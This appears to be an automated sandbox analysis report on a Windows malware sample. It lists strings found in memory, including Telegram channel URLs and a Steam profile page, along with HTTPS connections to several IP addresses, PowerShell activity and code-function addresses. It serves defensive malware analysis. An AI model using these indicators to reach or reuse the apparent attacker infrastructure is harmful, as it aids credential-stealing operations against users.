Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/_~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr String found in binary or memory: https://t.me/m3wm0w
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1812013102.0000000000A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/m3wm0w3
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/m3wm0w7
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/m3wm0wT
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/m3wm0wc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr String found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/y~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49711 version: TLS 1.2

System Summary

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00401625 NtQueryInformationProcess,NtQueryInformationProcess, 14_2_00401625
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Code function: 0_2_02830A40 0_2_02830A40
Source: C:\Users\user\Desktop\YYjRtxS70h.exe Code function: 0_2_02832309 0_2_02832309
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04E7B4A0 5_2_04E7B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04E7B490 5_2_04E7B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02C81762 7_2_02C81762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02C8096D 7_2_02C8096D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04BEB490 10_2_04BEB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04BE167D 10_2_04BE167D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04BE1044 10_2_04BE1044
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08CC3E98 10_2_08CC3E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04401855 11_2_04401855
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_044015E5 11_2_044015E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04401670 11_2_04401670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_04401364 11_2_04401364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04B6B4A0 13_2_04B6B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04B6B490 13_2_04B6B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08B83A98 13_2_08B83A98
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0043E893 14_2_0043E893
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C091 14_2_0040C091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E0A1 14_2_0040E0A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00430141 14_2_00430141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E161 14_2_0040E161
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00440101 14_2_00440101
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C111 14_2_0042C111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C121 14_2_0040C121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C1C1 14_2_0040C1C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004401C1 14_2_004401C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004121E1 14_2_004121E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A181 14_2_0040A181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00430251 14_2_00430251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C261 14_2_0040C261
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A221 14_2_0040A221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C221 14_2_0042C221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E231 14_2_0040E231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004122A1 14_2_004122A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00412351 14_2_00412351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E301 14_2_0040E301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00430311 14_2_00430311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00440311 14_2_00440311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C321 14_2_0042C321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A331 14_2_0040A331
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004103C1 14_2_004103C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C3C1 14_2_0042C3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004123F1 14_2_004123F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E3F1 14_2_0040E3F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C381 14_2_0040C381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A411 14_2_0040A411
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C421 14_2_0040C421
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004104D1 14_2_004104D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004404D1 14_2_004404D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004144E1 14_2_004144E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E4A1 14_2_0040E4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004124B1 14_2_004124B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00410571 14_2_00410571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E571 14_2_0040E571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C511 14_2_0042C511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A521 14_2_0040A521
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C531 14_2_0040C531
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A5C1 14_2_0040A5C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E641 14_2_0040E641
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00440611 14_2_00440611
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00410621 14_2_00410621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C631 14_2_0040C631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C6C1 14_2_0042C6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004106D1 14_2_004106D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C6D1 14_2_0040C6D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A6B1 14_2_0040A6B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A771 14_2_0040A771
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00440701 14_2_00440701
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E711 14_2_0040E711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004327C1 14_2_004327C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C781 14_2_0042C781
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004127A1 14_2_004127A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004107A1 14_2_004107A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00440811 14_2_00440811
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C821 14_2_0040C821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A821 14_2_0040A821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A8C1 14_2_0040A8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C8D1 14_2_0042C8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040E951 14_2_0040E951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00440951 14_2_00440951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040A961 14_2_0040A961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040C971 14_2_0040C971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042C9D1 14_2_0042C9D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_004109F1 14_2_004109F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00412991 14_2_00412991
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00408A41 14_2_00408A41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040AA71 14_2_0040AA71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040EA11 14_2_0040EA11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040CA31 14_2_0040CA31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040CAF1 14_2_0040CAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042CAA1 14_2_0042CAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00410AB1 14_2_00410AB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00412AB1 14_2_00412AB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042CB41 14_2_0042CB41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00432B51 14_2_00432B51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040AB61 14_2_0040AB61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00408B01 14_2_00408B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040EB01 14_2_0040EB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040EBC1 14_2_0040EBC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00408BC1 14_2_00408BC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040CBF1 14_2_0040CBF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00412B81 14_2_00412B81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00410B91 14_2_00410B91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00412C51 14_2_00412C51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040AC61 14_2_0040AC61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00408CE1 14_2_00408CE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040CD41 14_2_0040CD41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0040AD51 14_2_0040AD51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00414D61 14_2_00414D61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_0042CD61 14_2_0042CD61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe Code function: 14_2_00408D71 14_2_00408D71
